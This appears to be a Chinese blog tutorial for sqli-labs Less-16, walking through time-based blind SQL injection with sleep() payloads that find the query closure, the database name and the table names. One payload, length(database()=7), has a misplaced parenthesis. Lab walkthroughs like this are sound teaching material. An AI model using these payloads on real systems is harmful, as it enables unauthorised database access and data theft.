当前位置: 首页 > news >正文

SQL 时间盲注 (injection 第十六关)

简介


        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       

SQL注入的一个简要流程:


1、打开目标靶场

2、选择less - 16

3、确定网站可以注入的参数

本关可以直接在输入框中搜索 

4、判断闭合方式   

本关为 1") #

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如:   1") and if(length(database()=7),sleep(8),1) #

发现没有时间延迟,则数据库长度不为7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

  1") and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表


查询第一张表的第一个字符

1") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。


http://www.mrgr.cn/news/2072.html

相关文章:

  • Kubernetes Pod入门
  • 基于深度学习的图像特征优化识别复杂环境中的果蔬【多种模型切换】
  • 学习大数据DAY39 基于 hive 的 SQL语句
  • 【Linux】Linux(centos7)安装jdk1.8
  • [openSSL]TLS 1.3握手分析
  • node版本8.x→16.x,前端维护火葬场,问题及解决方案总结
  • ViT笔记学习
  • 【Word多级标题完整设置】设置各级标题样式将多级列表链接到各级标题样式中
  • python的列表与元组
  • 【每日刷题】Day104
  • 多线程【基础】
  • 设计模式---构建者模式(Builder Pattern)
  • 瑞友科技项目经理认证负责人杨文娟受邀为第四届中国项目经理大会演讲嘉宾︱PMO评论
  • 如何在Java中将数据库查询结果转换为枚举类型
  • 乾坤qiankun搭建前端微服务
  • 橙色简洁大气体育直播自适应模板赛事直播门户自适应网站源码
  • 基于Shader实现的UGUI描边解决方案遇到的bug
  • 智能安全守护,寺庙安全用电解决方案
  • 基础Floyd-Warshall算法
  • C#单例模式